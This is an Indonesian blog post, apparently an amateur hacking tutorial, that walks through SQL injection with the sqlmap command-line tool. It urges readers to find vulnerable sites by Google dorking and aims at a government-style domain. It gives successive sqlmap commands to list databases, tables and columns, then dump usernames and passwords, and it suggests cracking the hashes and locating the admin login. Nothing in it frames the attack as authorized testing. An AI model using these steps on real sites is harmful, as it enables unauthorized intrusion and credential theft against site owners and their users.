Malem minna-san ^_^ , di post saya udh share sql-injection dengan havij. sekarang gw mau share sql-injection yg versi CLI bro. gw saranin kalo maenan sql-inject pake yg GUI aja, kalo yg versi ini agak membingungkan bagi yg baru belajar ^_^ . ok langsung saja :
pastinya kalian udah punya website yg vuln buat di anu dong ? , kalau belom dorking dulu di gugel .
[+] jalanin sqlmap, di linux bisa, windows juga bisa. untuk master-sqlmap bisa cari gugel .
bagi yg belom tau perintahnya bisa ketik => sqlmap -h
[+] sqlmap -u http://example.gov.id/index.php?id=1 --dbs
--dbs = Database
tampil tuh databasenya, tinggal kita anu tabelnya
[+] sqlmap -u http://example.gov.id/index.php?id=1 -D apadana1_db --tables
terlihat tabelnya'kan ? , gw mau coba liat kolom dari tabel "user" , mencurigakan :3
[+] sqlmap -u http://example.gov.id/index.php?id=1 -D apadana1_db -T users --columns
nice , ada data "UserName" & "Password" , kalau udh ketemu langsung saja kita dump
[+] sqlmap -u http://example.gov.id/index.php?id=1 -D apadana1_db -T user -C UserName,Password --dump
DOR ! , ketemu tuh . passwordnya tinggal di decrypt di hashkiller ^_^ . kalau kesusahan cari halaman login, pake cara gw yg udh gw share sebelum artikel ini ok ^_^ . Terimakasih sudah berkunjung semoga bermanfaat gan.
Post a Comment
Post a Comment